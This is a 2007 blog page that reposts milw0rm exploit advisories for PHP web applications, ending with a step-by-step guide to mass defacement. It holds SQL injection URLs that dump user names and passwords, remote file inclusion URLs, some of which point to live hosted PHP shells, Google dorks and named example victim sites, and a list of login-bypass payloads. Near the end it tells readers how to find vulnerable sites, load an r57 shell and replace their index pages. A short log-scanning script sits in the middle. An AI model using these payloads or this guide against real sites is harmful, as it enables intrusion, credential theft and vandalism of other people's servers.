Saturday, 20 October 2007

Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Found by: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-16]

PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit


PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

--------------------------------

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

--------------------------------

Found by: xoron

xoron.biz

--------------------------------

Exploit:

index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

--------------------------------

Example: http://www.basicwallpapers.dk/infusions/arcade/

--------------------------------

Google Dork:
/infusions/arcade/ 18.000 sites:)

--------------------------------

Ekin0x / --> evilc0der.org <--

--------------------------------

# milw0rm.com [2007-04-02]

PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln

--------------------------------

PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln

--------------------------------

Found by: xoron - unique

xoron.biz

--------------------------------

Exploit:

index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*

--------------------------------

Example: http://www.321spil.dk/infusions/topliste/

--------------------------------

Google Dork:
infusions/topliste/ 990 sites:)

--------------------------------

Ekin0x / --> evilc0der.org <--

--------------------------------

# milw0rm.com [2007-04-02]

PostNuke pnFlashGames Module v1.5 Remote SQL Injection

============================================================

PostNuke pnFlashGames Module v1.5 Remote SQL Injection

============================================================

Found by: xoron


xoron.biz

+

Love's the funeral of hearts

The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you

:(

============================================================

Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*

============================================================

Example: http://andersonvision.com/PostNuke/
============================================================

# milw0rm.com [2007-04-28]

IntegralMOD

------------------------

Found: xoron

------------------------

Vendor: http://www.integramod.nl/forum/portal.php

Download: http://sourceforge.net/project/showfiles.php?group_id=191355

------------------------
Exploit:

includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?

------------------------

The king is the king!

------------------------

# milw0rm.com [2007-09-27]

phpBB Openid 0.2.0 Remote File Include

============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================

# milw0rm.com [2007-09-30]

Joomla com_wmtgallery Remote File Include

============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
=Joomla com_wmtgallery Remote File Include
= =
============================================
=
= Download:
=
= http://www.webmaster-tips.net
=
============================================
=
= Exploit:
= /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=shell?
=
============================================
= =
= Happy Ramadan Eid to the whole Islamic world =
= =
============================================

# milw0rm.com [2007-10-07]

Joomla com_colorlab Remote File Include

--------------------

Joomla com_colorlab Remote File Include

--------------------

Found : xoron

--------------------

Download:
http://download.joomlaportal.ch/content/view/474/

--------------------

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.color.php
2-write this code before the wrong code

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit

--------------------

Thanx: mdx :)

--------------------

# milw0rm.com [2007-10-12]

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

--------------------

KwsPHP 1.0 mg2 Module Remote SQL Injection Exploit

--------------------

Found : xoron

--------------------

Exploit:

Name:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pseudo,3,4,5/**/from/**/users/**/where/**/id=1/*

Pass:
index.php?mod=mg2&album=-1/**/union/**/select/**/0,1,pass,3,4,5/**/from/**/users/**/where/**/id=1/*

--------------------

From now on always alone, always one, xoron..!

--------------------

# milw0rm.com [2007-10-13]

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Author : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64, |
| exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX; |
| |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------

# milw0rm.com [2007-03-15]

ClassWeb <= 2.03 Remote File Include Vulnerabilities

# ClassWeb <= 2.03 Remote File Include Vulnerabilities
# D.Script: http://sourceforge.net/projects/classweb/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:
# [path]/classweb/language.php?BASE=Shell
# [Path]/classweb/phpadmin/survey.php?BASE=Shell

# milw0rm.com [2007-03-22]

Webavis Remote file inclusion (root)

#Webavis Remote file inclusion (root)

#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/webavis/class/class.php?root=shell.txt ?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-25]

Dagger-web engine(cal.func.php)Remote File Inclusion

###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.zip

#found by: katatafish (karatatata@hush.com)

#code: (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]

#Thanks: str0ke

# milw0rm.com [2007-06-24]

EVA-Web 1.1

###############################################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
###############################################################################################
#Program Title ################################################################################
#EVA-Web 1.1<=2.2 Remote File Inclusion
#
#Note #######################################################################################
#A patch was released some time ago..but there was never an exploit released..
#
#Script Download ##############################################################################
#http://spip-edu.edres74.net
#
#d0rk ######################################################################################
#"et utilise le squelette EVA-Web" -3.0 -2.3
#
#Spl0it #########################################################################################
#www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?
#www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#, Bernard, and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-06-26]

IBM Rational ClearQuest Web Login Bypass (SQL Injection)

+==============================================================+
+ IBM Rational ClearQuest Web Login Bypass (SQL Injection) +
+==============================================================+

DISCOVERED BY:
==============
SecureState
sasquatch - swhite@securestate.com
rel1k - dkennedy@securestate.com

HOMEPAGE:
=========
www.securestate.com


AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...


SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================
' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...

Confirmed against:
==================
version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630

FULL SQL Statement is spit back in error message:
=================================================
SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE

# milw0rm.com [2007-08-14]

webED 0.8999

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz
# Exploit:
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]
---------------------------------------------------------------

# milw0rm.com [2007-09-08]

WebDesktop 0.1

\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : WebDesktop 0.1
Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

include($wsk . ".wsk/" . $wsk . ".php");

&&&&&&&&

include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]
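
The advisories above share two request shapes that are easy to spot in web server logs: a UNION SELECT whose spaces are replaced by /**/ comments, and a query parameter whose value is itself a remote URL. The following is an added example for log triage, not code from any of the advisories or projects listed; the log lines, hosts, paths and parameter names in it are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)  # value is itself a URL
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, made-up paths and names).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2007:10:00:01 +0000] "GET /index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2/**/FROM/**/t/* HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Oct/2007:10:00:02 +0000] "GET /admin.php?base_path=http://files.example.test/x.txt? HTTP/1.1" 200 0',
    '192.0.2.12 - - [12/Oct/2007:10:00:03 +0000] "GET /index.php?cid=7&page=2 HTTP/1.1" 200 2048',
    '192.0.2.13 - - [12/Oct/2007:10:00:04 +0000] "GET /login.php?next=http://app.example.test/home HTTP/1.1" 302 0',
]


def classify_request(target, url_params_ok=frozenset()):
    """Return sorted findings for one request target (path?query)."""
    findings = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded payloads
        # Strip SQL comments first so UNION/**/SELECT reads as UNION SELECT.
        if UNION_SELECT.search(SQL_COMMENT.sub(" ", value)):
            findings.add("sqli-union:" + name)
        # URL-valued parameters are only a signal: parameters that legitimately
        # carry URLs (redirect targets and the like) go in url_params_ok.
        if name not in url_params_ok and REMOTE_URL.match(value):
            findings.add("rfi-url:" + name)
    return sorted(findings)


def scan_access_log(lines, url_params_ok=frozenset()):
    """Return [(client_ip, findings)] for combined-format lines that match."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            found = classify_request(m.group(2), url_params_ok)
            if found:
                hits.append((m.group(1), found))
    return hits


if __name__ == "__main__":
    for ip, found in scan_access_log(SAMPLE_LOG, url_params_ok={"next"}):
        print(ip, ", ".join(found))
```

A hit is a reason to look at the request and the script it targeted, not proof of compromise; the fix remains on the application side, as in the "How to Fix" note for com_colorlab above.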

How to use the exploits on the site http://milw0rm.com

1. Open www.milw0rm.com
2. Click Search
3. Type RFI (Remote File Inclusion)
4. Look for the newest exploit, or for a well-known CMS/application
5. Open Google and look at the advisory we picked
6. * If there is a DORK [Google keyword], use that dork, * If not, use the title of the exploit
7. Once you have the results from Google, right-click and Open New Tab [this is the advantage of using Firefox, though the latest version of IE can also open a new tab]
8. Keep opening entries from the Google result list until you feel the browser is full
9. Try the results one by one with the exploit command given in the advisory
10. If an error message appears, look for an error message that states a File Inclusion failure, not File Not Found.
11. If you get File Not Found, possibly the relative path for that site is wrong, or it really is a different version, or other possibilities
12. If you get a File Inclusion error message, or a blank white page with no error message,
13. Replace the exploit command after the '=' [equals] sign with http://bugs.byethost32.com/php3.txt? [a phpshell that is online/active]
14. Look at the screen: did the site succeed in executing and displaying the r57shell PHP shell, or is there only a blank page and the File Inclusion error appears again
15. If the site succeeds in showing r57shell [phpshell], go on to look for files and directories that have full access, or -rwxrwxrwx / -rw-rw-rw <-- for files | drwxrwxrwx / drw-rw-rw <-- for directories
16. Once you have found such a file or directory, you can upload your own version of index.html, or change index.php or .html to your own version of the code; don't forget to fly the manadocoding name there...hehe, understandably, that's my forum!!!
17. After changing the file, check it in the browser at the relative path you changed


Original post by ping_win (we're feeling too lazy to type)

Hope this helps,
